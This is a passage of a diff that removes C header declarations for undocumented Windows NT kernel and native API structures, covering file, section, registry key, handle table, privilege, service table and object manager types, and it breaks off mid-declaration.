-typedef struct _FILE_REPARSE_POINT_INFORMATION {
- LONGLONG FileReference;
- ULONG Tag;
-} FILE_REPARSE_POINT_INFORMATION, *PFILE_REPARSE_POINT_INFORMATION;
-
-typedef struct _FILE_LINK_ENTRY_INFORMATION {
- ULONG NextEntryOffset;
- LONGLONG ParentFileId;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_LINK_ENTRY_INFORMATION, *PFILE_LINK_ENTRY_INFORMATION;
-
-typedef struct _FILE_LINKS_INFORMATION {
- ULONG BytesNeeded;
- ULONG EntriesReturned;
- FILE_LINK_ENTRY_INFORMATION Entry;
-} FILE_LINKS_INFORMATION, *PFILE_LINKS_INFORMATION;
-
-typedef struct _FILE_NETWORK_PHYSICAL_NAME_INFORMATION {
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_NETWORK_PHYSICAL_NAME_INFORMATION, *PFILE_NETWORK_PHYSICAL_NAME_INFORMATION;
-
-typedef struct _FILE_STANDARD_LINK_INFORMATION {
- ULONG NumberOfAccessibleLinks;
- ULONG TotalNumberOfLinks;
- BOOLEAN DeletePending;
- BOOLEAN Directory;
-} FILE_STANDARD_LINK_INFORMATION, *PFILE_STANDARD_LINK_INFORMATION;
-
-typedef struct _FILE_SFIO_RESERVE_INFORMATION {
- ULONG RequestsPerPeriod;
- ULONG Period;
- BOOLEAN RetryFailures;
- BOOLEAN Discardable;
- ULONG RequestSize;
- ULONG NumOutstandingRequests;
-} FILE_SFIO_RESERVE_INFORMATION, *PFILE_SFIO_RESERVE_INFORMATION;
-
-typedef struct _FILE_SFIO_VOLUME_INFORMATION {
- ULONG MaximumRequestsPerPeriod;
- ULONG MinimumPeriod;
- ULONG MinimumTransferSize;
-} FILE_SFIO_VOLUME_INFORMATION, *PFILE_SFIO_VOLUME_INFORMATION;
-
-//
-// Define the flags for NtSet(Query)EaFile service structure entries
-//
-
-#define FILE_NEED_EA 0x00000080
-
-//
-// Define EA type values
-//
-
-#define FILE_EA_TYPE_BINARY 0xfffe
-#define FILE_EA_TYPE_ASCII 0xfffd
-#define FILE_EA_TYPE_BITMAP 0xfffb
-#define FILE_EA_TYPE_METAFILE 0xfffa
-#define FILE_EA_TYPE_ICON 0xfff9
-#define FILE_EA_TYPE_EA 0xffee
-#define FILE_EA_TYPE_MVMT 0xffdf
-#define FILE_EA_TYPE_MVST 0xffde
-#define FILE_EA_TYPE_ASN1 0xffdd
-#define FILE_EA_TYPE_FAMILY_IDS 0xff01
-
-typedef struct _FILE_FULL_EA_INFORMATION {
- ULONG NextEntryOffset;
- UCHAR Flags;
- UCHAR EaNameLength;
- USHORT EaValueLength;
- CHAR EaName[1];
-} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;
-
-typedef struct _FILE_GET_EA_INFORMATION {
- ULONG NextEntryOffset;
- UCHAR EaNameLength;
- CHAR EaName[1];
-} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;
-
-typedef struct _FILE_GET_QUOTA_INFORMATION {
- ULONG NextEntryOffset;
- ULONG SidLength;
- SID Sid;
-} FILE_GET_QUOTA_INFORMATION, *PFILE_GET_QUOTA_INFORMATION;
-
-typedef struct _FILE_QUOTA_INFORMATION {
- ULONG NextEntryOffset;
- ULONG SidLength;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER QuotaUsed;
- LARGE_INTEGER QuotaThreshold;
- LARGE_INTEGER QuotaLimit;
- SID Sid;
-} FILE_QUOTA_INFORMATION, *PFILE_QUOTA_INFORMATION;
-
-typedef struct _FILE_DIRECTORY_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_DIRECTORY_INFORMATION, *PFILE_DIRECTORY_INFORMATION;
-
-typedef struct _FILE_FULL_DIR_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- ULONG EaSize;
- WCHAR FileName[1];
-} FILE_FULL_DIR_INFORMATION, *PFILE_FULL_DIR_INFORMATION;
-
-typedef struct _FILE_ID_FULL_DIR_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- ULONG EaSize;
- LARGE_INTEGER FileId;
- WCHAR FileName[1];
-} FILE_ID_FULL_DIR_INFORMATION, *PFILE_ID_FULL_DIR_INFORMATION;
-
-typedef struct _FILE_BOTH_DIR_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- ULONG EaSize;
- CCHAR ShortNameLength;
- WCHAR ShortName[12];
- WCHAR FileName[1];
-} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;
-
-typedef struct _FILE_ID_BOTH_DIR_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- ULONG EaSize;
- CCHAR ShortNameLength;
- WCHAR ShortName[12];
- LARGE_INTEGER FileId;
- WCHAR FileName[1];
-} FILE_ID_BOTH_DIR_INFORMATION, *PFILE_ID_BOTH_DIR_INFORMATION;
-
-typedef struct _FILE_NAMES_INFORMATION {
- ULONG NextEntryOffset;
- ULONG FileIndex;
- ULONG FileNameLength;
- WCHAR FileName[1];
-} FILE_NAMES_INFORMATION, *PFILE_NAMES_INFORMATION;
-
-typedef struct _FILE_OBJECTID_INFORMATION {
- LONGLONG FileReference;
- UCHAR ObjectId[16];
- union {
- struct {
- UCHAR BirthVolumeId[16];
- UCHAR BirthObjectId[16];
- UCHAR DomainId[16];
- };
- UCHAR ExtendedInfo[48];
- };
-} FILE_OBJECTID_INFORMATION, *PFILE_OBJECTID_INFORMATION;
-
-typedef struct _FILE_FS_VOLUME_INFORMATION {
- LARGE_INTEGER VolumeCreationTime;
- ULONG VolumeSerialNumber;
- ULONG VolumeLabelLength;
- BOOLEAN SupportsObjects;
- WCHAR VolumeLabel[1];
-} FILE_FS_VOLUME_INFORMATION, *PFILE_FS_VOLUME_INFORMATION;
-
-typedef struct _FILE_ID_GLOBAL_TX_DIR_INFORMATION
-{
- ULONG NextEntryOffset;
- ULONG FileIndex;
- LARGE_INTEGER CreationTime;
- LARGE_INTEGER LastAccessTime;
- LARGE_INTEGER LastWriteTime;
- LARGE_INTEGER ChangeTime;
- LARGE_INTEGER EndOfFile;
- LARGE_INTEGER AllocationSize;
- ULONG FileAttributes;
- ULONG FileNameLength;
- LARGE_INTEGER FileId;
- GUID LockingTransactionId;
- ULONG TxInfoFlags;
- WCHAR FileName[1];
-} FILE_ID_GLOBAL_TX_DIR_INFORMATION, *PFILE_ID_GLOBAL_TX_DIR_INFORMATION;
-
-/*
-** File END
-*/
-
-/*
-** Section START
-*/
-
-typedef enum _SECTION_INFORMATION_CLASS {
- SectionBasicInformation,
- SectionImageInformation,
- SectionRelocationInformation,
- SectionOriginalBaseInformation,
- SectionInternalImageInformation,
- MaxSectionInfoClass
-} SECTION_INFORMATION_CLASS;
-
-typedef struct _SECTION_BASIC_INFO {
- PVOID BaseAddress;
- ULONG AllocationAttributes;
- LARGE_INTEGER MaximumSize;
-} SECTION_BASIC_INFORMATION, *PSECTION_BASIC_INFORMATION;
-
-typedef struct _SECTION_IMAGE_INFORMATION {
- PVOID TransferAddress;
- ULONG ZeroBits;
- SIZE_T MaximumStackSize;
- SIZE_T CommittedStackSize;
- ULONG SubSystemType;
- union {
- struct {
- USHORT SubSystemMinorVersion;
- USHORT SubSystemMajorVersion;
- };
- ULONG SubSystemVersion;
- };
- union
- {
- struct
- {
- USHORT MajorOperatingSystemVersion;
- USHORT MinorOperatingSystemVersion;
- };
- ULONG OperatingSystemVersion;
- };
- USHORT ImageCharacteristics;
- USHORT DllCharacteristics;
- USHORT Machine;
- BOOLEAN ImageContainsCode;
- union
- {
- UCHAR ImageFlags;
- struct
- {
- UCHAR ComPlusNativeReady : 1;
- UCHAR ComPlusILOnly : 1;
- UCHAR ImageDynamicallyRelocated : 1;
- UCHAR ImageMappedFlat : 1;
- UCHAR BaseBelow4gb : 1;
- UCHAR ComPlusPrefer32bit : 1;
- UCHAR Reserved : 2;
- };
- };
- ULONG LoaderFlags;
- ULONG ImageFileSize;
- ULONG CheckSum;
-} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
-
-typedef struct _SECTION_IMAGE_INFORMATION64 {
- ULONGLONG TransferAddress;
- ULONG ZeroBits;
- ULONGLONG MaximumStackSize;
- ULONGLONG CommittedStackSize;
- ULONG SubSystemType;
- union {
- struct {
- USHORT SubSystemMinorVersion;
- USHORT SubSystemMajorVersion;
- };
- ULONG SubSystemVersion;
- };
- union
- {
- struct
- {
- USHORT MajorOperatingSystemVersion;
- USHORT MinorOperatingSystemVersion;
- };
- ULONG OperatingSystemVersion;
- };
- USHORT ImageCharacteristics;
- USHORT DllCharacteristics;
- USHORT Machine;
- BOOLEAN ImageContainsCode;
- union
- {
- UCHAR ImageFlags;
- struct
- {
- UCHAR ComPlusNativeReady : 1;
- UCHAR ComPlusILOnly : 1;
- UCHAR ImageDynamicallyRelocated : 1;
- UCHAR ImageMappedFlat : 1;
- UCHAR BaseBelow4gb : 1;
- UCHAR ComPlusPrefer32bit : 1;
- UCHAR Reserved : 2;
- };
- };
- ULONG LoaderFlags;
- ULONG ImageFileSize;
- ULONG CheckSum;
-} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64;
-
-typedef struct _SECTION_INTERNAL_IMAGE_INFORMATION {
- SECTION_IMAGE_INFORMATION SectionInformation;
- union
- {
- ULONG ExtendedFlags;
- struct
- {
- ULONG ImageExportSuppressionEnabled : 1;
- ULONG Reserved : 31;
- };
- };
-} SECTION_INTERNAL_IMAGE_INFORMATION, *PSECTION_INTERNAL_IMAGE_INFORMATION;
-
-typedef enum _SECTION_INHERIT {
- ViewShare = 1,
- ViewUnmap = 2
-} SECTION_INHERIT;
-
-#ifndef SEC_BASED
-#define SEC_BASED 0x200000
-#endif
-
-#ifndef SEC_NO_IMAGE
-#define SEC_NO_CHANGE 0x400000
-#endif
-
-#ifndef SEC_FILE
-#define SEC_FILE 0x800000
-#endif
-
-#ifndef SEC_IMAGE
-#define SEC_IMAGE 0x1000000
-#endif
-
-#ifndef SEC_RESERVE
-#define SEC_RESERVE 0x4000000
-#endif
-
-#ifndef SEC_COMMIT
-#define SEC_COMMIT 0x8000000
-#endif
-
-#ifndef SEC_NOCACHE
-#define SEC_NOCACHE 0x10000000
-#endif
-
-#ifndef SEC_GLOBAL
-#define SEC_GLOBAL 0x20000000
-#endif
-
-#ifndef SEC_LARGE_PAGES
-#define SEC_LARGE_PAGES 0x80000000
-#endif
-
-/*
-** Section END
-*/
-
-/*
-** System Table START
-*/
-#define NUMBER_SERVICE_TABLES 2
-#define NTOS_SERVICE_INDEX 0
-#define WIN32K_SERVICE_INDEX 1
-#define SERVICE_NUMBER_MASK ((1 << 12) - 1)
-
-#if defined(_WIN64)
-
-#if defined(_AMD64_)
-
-#define SERVICE_TABLE_SHIFT (12 - 4)
-#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
-#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
-
-#else
-
-#define SERVICE_TABLE_SHIFT (12 - 5)
-#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 5)
-#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 5)
-
-#endif
-
-#else
-
-#define SERVICE_TABLE_SHIFT (12 - 4)
-#define SERVICE_TABLE_MASK (((1 << 1) - 1) << 4)
-#define SERVICE_TABLE_TEST (WIN32K_SERVICE_INDEX << 4)
-
-#endif
-
-typedef struct _KSERVICE_TABLE_DESCRIPTOR {
- ULONG_PTR Base; //e.g. KiServiceTable
- PULONG Count;
- ULONG Limit;//e.g. KiServiceLimit
- PUCHAR Number; //e.g. KiArgumentTable
-} KSERVICE_TABLE_DESCRIPTOR, *PKSERVICE_TABLE_DESCRIPTOR;
-/*
-** System Table END
-*/
-
-/*
-** System Boot Environment START
-*/
-
-// Size=20
-typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1 {
- struct _GUID BootIdentifier;
- enum _FIRMWARE_TYPE FirmwareType;
-} SYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION_V1;
-
-// Size=32
-typedef struct _SYSTEM_BOOT_ENVIRONMENT_INFORMATION {
- struct _GUID BootIdentifier;
- enum _FIRMWARE_TYPE FirmwareType;
- unsigned __int64 BootFlags;
-} SYSTEM_BOOT_ENVIRONMENT_INFORMATION, *PSYSTEM_BOOT_ENVIRONMENT_INFORMATION;
-
-/*
-** System Boot Environment END
-*/
-
-/*
-** Key START
-*/
-
-typedef enum _KEY_INFORMATION_CLASS {
- KeyBasicInformation,
- KeyNodeInformation,
- KeyFullInformation,
- KeyNameInformation,
- KeyCachedInformation,
- KeyFlagsInformation,
- KeyVirtualizationInformation,
- KeyHandleTagsInformation,
- KeyTrustInformation,
- KeyLayerInformation,
- MaxKeyInfoClass
-} KEY_INFORMATION_CLASS;
-
-typedef enum _KEY_SET_INFORMATION_CLASS {
- KeyWriteTimeInformation,
- KeyWow64FlagsInformation,
- KeyControlFlagsInformation,
- KeySetVirtualizationInformation,
- KeySetDebugInformation,
- KeySetHandleTagsInformation,
- KeySetLayerInformation,
- MaxKeySetInfoClass
-} KEY_SET_INFORMATION_CLASS;
-
-typedef struct _KEY_FULL_INFORMATION {
- LARGE_INTEGER LastWriteTime;
- ULONG TitleIndex;
- ULONG ClassOffset;
- ULONG ClassLength;
- ULONG SubKeys;
- ULONG MaxNameLen;
- ULONG MaxClassLen;
- ULONG Values;
- ULONG MaxValueNameLen;
- ULONG MaxValueDataLen;
- WCHAR Class[1];
-} KEY_FULL_INFORMATION, *PKEY_FULL_INFORMATION;
-
-typedef struct _KEY_BASIC_INFORMATION {
- LARGE_INTEGER LastWriteTime;
- ULONG TitleIndex;
- ULONG NameLength;
- WCHAR Name[1];
-} KEY_BASIC_INFORMATION, *PKEY_BASIC_INFORMATION;
-
-typedef enum _KEY_VALUE_INFORMATION_CLASS {
- KeyValueBasicInformation,
- KeyValueFullInformation,
- KeyValuePartialInformation,
- KeyValueFullInformationAlign64,
- KeyValuePartialInformationAlign64,
- KeyValueLayerInformation,
- MaxKeyValueInfoClass
-} KEY_VALUE_INFORMATION_CLASS;
-
-typedef struct _KEY_VALUE_BASIC_INFORMATION {
- ULONG TitleIndex;
- ULONG Type;
- ULONG NameLength;
- WCHAR Name[1]; // Variable size
-} KEY_VALUE_BASIC_INFORMATION, *PKEY_VALUE_BASIC_INFORMATION;
-
-typedef struct _KEY_VALUE_FULL_INFORMATION {
- ULONG TitleIndex;
- ULONG Type;
- ULONG DataOffset;
- ULONG DataLength;
- ULONG NameLength;
- WCHAR Name[1]; // Variable size
- // Data[1]; // Variable size data not declared
-} KEY_VALUE_FULL_INFORMATION, *PKEY_VALUE_FULL_INFORMATION;
-
-typedef struct _KEY_VALUE_PARTIAL_INFORMATION {
- ULONG TitleIndex;
- ULONG Type;
- ULONG DataLength;
- UCHAR Data[1]; // Variable size
-} KEY_VALUE_PARTIAL_INFORMATION, *PKEY_VALUE_PARTIAL_INFORMATION;
-
-typedef struct _KEY_VALUE_PARTIAL_INFORMATION_ALIGN64 {
- ULONG Type;
- ULONG DataLength;
- UCHAR Data[1]; // Variable size
-} KEY_VALUE_PARTIAL_INFORMATION_ALIGN64, *PKEY_VALUE_PARTIAL_INFORMATION_ALIGN64;
-
-typedef struct _KEY_VALUE_ENTRY {
- PUNICODE_STRING ValueName;
- ULONG DataLength;
- ULONG DataOffset;
- ULONG Type;
-} KEY_VALUE_ENTRY, *PKEY_VALUE_ENTRY;
-
-/*
-** Key END
-*/
-
-
-/*
-** TIME_FIELDS START
-*/
-
-typedef struct _TIME_FIELDS {
- CSHORT Year; // range [1601...]
- CSHORT Month; // range [1..12]
- CSHORT Day; // range [1..31]
- CSHORT Hour; // range [0..23]
- CSHORT Minute; // range [0..59]
- CSHORT Second; // range [0..59]
- CSHORT Milliseconds;// range [0..999]
- CSHORT Weekday; // range [0..6] == [Sunday..Saturday]
-} TIME_FIELDS;
-typedef TIME_FIELDS *PTIME_FIELDS;
-
-/*
-** TIME_FIELDS END
-*/
-
-/*
-** HANDLE START
-*/
-
-typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
- USHORT UniqueProcessId;
- USHORT CreatorBackTraceIndex;
- UCHAR ObjectTypeIndex;
- UCHAR HandleAttributes;
- USHORT HandleValue;
- PVOID Object;
- ULONG GrantedAccess;
-} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
-
-typedef struct _SYSTEM_HANDLE_INFORMATION {
- ULONG NumberOfHandles;
- SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
-} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
-
-typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
- PVOID Object;
- ULONG_PTR UniqueProcessId;
- ULONG_PTR HandleValue;
- ULONG GrantedAccess;
- USHORT CreatorBackTraceIndex;
- USHORT ObjectTypeIndex;
- ULONG HandleAttributes;
- ULONG Reserved;
-} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
-
-typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
- ULONG_PTR NumberOfHandles;
- ULONG_PTR Reserved;
- SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
-} SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
-
-/*
-** HANDLE END
-*/
-
-// Privileges
-
-#define SE_MIN_WELL_KNOWN_PRIVILEGE (2L)
-#define SE_CREATE_TOKEN_PRIVILEGE (2L)
-#define SE_ASSIGNPRIMARYTOKEN_PRIVILEGE (3L)
-#define SE_LOCK_MEMORY_PRIVILEGE (4L)
-#define SE_INCREASE_QUOTA_PRIVILEGE (5L)
-#define SE_MACHINE_ACCOUNT_PRIVILEGE (6L)
-#define SE_TCB_PRIVILEGE (7L)
-#define SE_SECURITY_PRIVILEGE (8L)
-#define SE_TAKE_OWNERSHIP_PRIVILEGE (9L)
-#define SE_LOAD_DRIVER_PRIVILEGE (10L)
-#define SE_SYSTEM_PROFILE_PRIVILEGE (11L)
-#define SE_SYSTEMTIME_PRIVILEGE (12L)
-#define SE_PROF_SINGLE_PROCESS_PRIVILEGE (13L)
-#define SE_INC_BASE_PRIORITY_PRIVILEGE (14L)
-#define SE_CREATE_PAGEFILE_PRIVILEGE (15L)
-#define SE_CREATE_PERMANENT_PRIVILEGE (16L)
-#define SE_BACKUP_PRIVILEGE (17L)
-#define SE_RESTORE_PRIVILEGE (18L)
-#define SE_SHUTDOWN_PRIVILEGE (19L)
-#define SE_DEBUG_PRIVILEGE (20L)
-#define SE_AUDIT_PRIVILEGE (21L)
-#define SE_SYSTEM_ENVIRONMENT_PRIVILEGE (22L)
-#define SE_CHANGE_NOTIFY_PRIVILEGE (23L)
-#define SE_REMOTE_SHUTDOWN_PRIVILEGE (24L)
-#define SE_UNDOCK_PRIVILEGE (25L)
-#define SE_SYNC_AGENT_PRIVILEGE (26L)
-#define SE_ENABLE_DELEGATION_PRIVILEGE (27L)
-#define SE_MANAGE_VOLUME_PRIVILEGE (28L)
-#define SE_IMPERSONATE_PRIVILEGE (29L)
-#define SE_CREATE_GLOBAL_PRIVILEGE (30L)
-#define SE_TRUSTED_CREDMAN_ACCESS_PRIVILEGE (31L)
-#define SE_RELABEL_PRIVILEGE (32L)
-#define SE_INC_WORKING_SET_PRIVILEGE (33L)
-#define SE_TIME_ZONE_PRIVILEGE (34L)
-#define SE_CREATE_SYMBOLIC_LINK_PRIVILEGE (35L)
-#define SE_MAX_WELL_KNOWN_PRIVILEGE SE_CREATE_SYMBOLIC_LINK_PRIVILEGE
-
-//
-// Generic test for success on any status value (non-negative numbers
-// indicate success).
-//
-
-#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
-
-//
-// Generic test for information on any status value.
-//
-
-#define NT_INFORMATION(Status) ((ULONG)(Status) >> 30 == 1)
-
-//
-// Generic test for warning on any status value.
-//
-
-#define NT_WARNING(Status) ((ULONG)(Status) >> 30 == 2)
-
-//
-// Generic test for error on any status value.
-//
-
-#define NT_ERROR(Status) ((ULONG)(Status) >> 30 == 3)
-
-
-/*
-** OBJECT MANAGER START
-*/
-
-//
-// Header flags
-//
-
-#define OB_FLAG_NEW_OBJECT 0x01
-#define OB_FLAG_KERNEL_OBJECT 0x02
-#define OB_FLAG_CREATOR_INFO 0x04
-#define OB_FLAG_EXCLUSIVE_OBJECT 0x08
-#define OB_FLAG_PERMANENT_OBJECT 0x10
-#define OB_FLAG_DEFAULT_SECURITY_QUOTA 0x20
-#define OB_FLAG_SINGLE_HANDLE_ENTRY 0x40
-#define OB_FLAG_DELETED_INLINE 0x80
-
-//
-// InfoMask values
-//
-
-#define OB_INFOMASK_PROCESS_INFO 0x10
-#define OB_INFOMASK_QUOTA 0x08
-#define OB_INFOMASK_HANDLE 0x04
-#define OB_INFOMASK_NAME 0x02
-#define OB_INFOMASK_CREATOR_INFO 0x01
-
-#define OBJ_INVALID_SESSION_ID 0xFFFFFFFF
-#define NUMBER_HASH_BUCKETS 37
-
-typedef struct _OBJECT_DIRECTORY_ENTRY {
- PVOID ChainLink;
- PVOID Object;
- ULONG HashValue;
-} OBJECT_DIRECTORY_ENTRY, *POBJECT_DIRECTORY_ENTRY;
-
-typedef struct _EX_PUSH_LOCK {
- union
- {
- ULONG Locked : 1;
- ULONG Waiting : 1;
- ULONG Waking : 1;
- ULONG MultipleShared : 1;
- ULONG Shared : 28;
- ULONG Value;
- PVOID Ptr;
- };
-} EX_PUSH_LOCK, *PEX_PUSH_LOCK;
-
-typedef struct _OBJECT_NAMESPACE_LOOKUPTABLE {
- LIST_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
- EX_PUSH_LOCK Lock;
- ULONG NumberOfPrivateSpaces;
-} OBJECT_NAMESPACE_LOOKUPTABLE, *POBJECT_NAMESPACE_LOOKUPTABLE;
-
-typedef struct _OBJECT_NAMESPACE_ENTRY {
- LIST_ENTRY ListEntry;
- PVOID NamespaceRootDirectory;
- ULONG SizeOfBoundaryInformation;
- ULONG Reserved;
- UCHAR HashValue;
- ULONG_PTR Alignment;
-} OBJECT_NAMESPACE_ENTRY, *POBJECT_NAMESPACE_ENTRY;
-
-typedef enum _BOUNDARY_ENTRY_TYPE {
- OBNS_Invalid = 0,
- OBNS_Name = 1,
- OBNS_SID = 2,
- OBNS_IntegrityLabel = 3
-} BOUNDARY_ENTRY_TYPE;
-
-typedef struct _OBJECT_BOUNDARY_ENTRY {
- BOUNDARY_ENTRY_TYPE EntryType;
- ULONG EntrySize;
-} OBJECT_BOUNDARY_ENTRY, *POBJECT_BOUNDARY_ENTRY;
-
-typedef struct _OBJECT_BOUNDARY_DESCRIPTOR {
- ULONG Version;
- ULONG Items;
- ULONG TotalSize;
- ULONG Reserved;
-} OBJECT_BOUNDARY_DESCRIPTOR, *POBJECT_BOUNDARY_DESCRIPTOR;
-
-typedef struct _OBJECT_DIRECTORY {
- POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
- EX_PUSH_LOCK Lock;
- PDEVICE_MAP DeviceMap;
- ULONG SessionId;
- PVOID NamespaceEntry;
- ULONG Flags;
-} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
-
-typedef struct _OBJECT_DIRECTORY_V2 {
- POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
- EX_PUSH_LOCK Lock;
- PDEVICE_MAP DeviceMap;
- POBJECT_DIRECTORY ShadowDirectory;
- ULONG SessionId;
- PVOID NamespaceEntry;
- ULONG Flags;
- LONG Padding[1];
-} OBJECT_DIRECTORY_V2, *POBJECT_DIRECTORY_V2;
-
-typedef struct _OBJECT_DIRECTORY_V3 {
- POBJECT_DIRECTORY_ENTRY HashBuckets[NUMBER_HASH_BUCKETS];
- EX_PUSH_LOCK Lock;
- PDEVICE_MAP DeviceMap;
- POBJECT_DIRECTORY ShadowDirectory;
- PVOID NamespaceEntry;
- PVOID SessionObject;
- ULONG Flags;
- ULONG SessionId;
-} OBJECT_DIRECTORY_V3, *POBJECT_DIRECTORY_V3;
-
-typedef struct _OBJECT_HEADER_NAME_INFO {
- POBJECT_DIRECTORY Directory;
- UNICODE_STRING Name;
- ULONG QueryReferences;
-} OBJECT_HEADER_NAME_INFO, *POBJECT_HEADER_NAME_INFO;
-
-typedef struct _OBJECT_HEADER_CREATOR_INFO {// Size=32
- LIST_ENTRY TypeList; // Size=16 Offset=0
- PVOID CreatorUniqueProcess; // Size=8 Offset=16
- USHORT CreatorBackTraceIndex; // Size=2 Offset=24
- USHORT Reserved; // Size=2 Offset=26
-} OBJECT_HEADER_CREATOR_INFO, *POBJECT_HEADER_CREATOR_INFO;
-
-typedef struct _OBJECT_HANDLE_COUNT_ENTRY {// Size=16
- PVOID Process; // Size=8 Offset=0
- struct
- {
- unsigned long HandleCount : 24; // Size=4 Offset=8 BitOffset=0 BitCount=24
- unsigned long LockCount : 8; // Size=4 Offset=8 BitOffset=24 BitCount=8
- };
-} OBJECT_HANDLE_COUNT_ENTRY, *POBJECT_HANDLE_COUNT_ENTRY;
-
-typedef struct _OBJECT_HEADER_HANDLE_INFO { // Size=16
- union {
- PVOID HandleCountDataBase; // Size=8 Offset=0
- struct _OBJECT_HANDLE_COUNT_ENTRY SingleEntry; // Size=16 Offset=0
- };
-} OBJECT_HEADER_HANDLE_INFO, *POBJECT_HEADER_HANDLE_INFO;
-
-typedef struct _OBJECT_HEADER_PROCESS_INFO { // Size=16
- PVOID ExclusiveProcess; // Size=8 Offset=0
- PVOID Reserved; // Size=8 Offset=8
-} OBJECT_HEADER_PROCESS_INFO, *POBJECT_HEADER_PROCESS_INFO;
-
-typedef struct _OBJECT_HEADER_QUOTA_INFO {
- ULONG PagedPoolCharge; //4
- ULONG NonPagedPoolCharge; //4
- ULONG SecurityDescriptorCharge; //4
- PVOID SecurityDescriptorQuotaBlock; //sizeof(pointer)
- unsigned __int64 Reserved; //sizeof(uint64)
-} OBJECT_HEADER_QUOTA_INFO, *POBJECT_HEADER_QUOTA_INFO;
-
-typedef struct _OBJECT_HEADER_PADDING_INFO {
- ULONG PaddingAmount;
-} OBJECT_HEADER_PADDING_INFO, *POBJECT_HEADER_PADDING_INFO;
-
-typedef struct _OBJECT_HEADER_AUDIT_INFO {
- PVOID SecurityDescriptor;
- PVOID Reserved;
-} OBJECT_HEADER_AUDIT_INFO, *POBJECT_HEADER_AUDIT_INFO;
-
-typedef struct _OBJECT_HEADER_EXTENDED_INFO {
- struct _OBJECT_FOOTER *Footer;
- PVOID Reserved;
-} OBJECT_HEADER_EXTENDED_INFO, POBJECT_HEADER_EXTENDED_INFO;
-
-typedef struct _OB_HANDLE_REVOCATION_BLOCK
-{
- LIST_ENTRY RevocationInfos;
- struct _EX_PUSH_LOCK Lock;
- struct _EX_RUNDOWN_REF Rundown;
-} OB_HANDLE_REVOCATION_BLOCK, *POB_HANDLE_REVOCATION_BLOCK;
-
-typedef struct _OBJECT_HEADER_HANDLE_REVOCATION_INFO {
- LIST_ENTRY ListEntry;
- OB_HANDLE_REVOCATION_BLOCK* RevocationBlock;
- unsigned char Padding1[4];
- unsigned char Padding2[4];
-} OBJECT_HEADER_HANDLE_REVOCATION_INFO, *POBJECT_HEADER_HANDLE_REVOCATION_INFO;
-
-typedef struct _QUAD {
- union {
- INT64 UseThisFieldToCopy;
- float DoNotUseThisField;
- };
-} QUAD, *PQUAD;
-
-typedef struct _OBJECT_CREATE_INFORMATION {
- ULONG Attributes;
- PVOID RootDirectory;
- CHAR ProbeMode;
- ULONG PagedPoolCharge;
- ULONG NonPagedPoolCharge;
- ULONG SecurityDescriptorCharge;
- PVOID SecurityDescriptor;
- PSECURITY_QUALITY_OF_SERVICE SecurityQos;
- SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;
-} OBJECT_CREATE_INFORMATION, *POBJECT_CREATE_INFORMATION;
-
-typedef struct _SECURITY_CLIENT_CONTEXT {
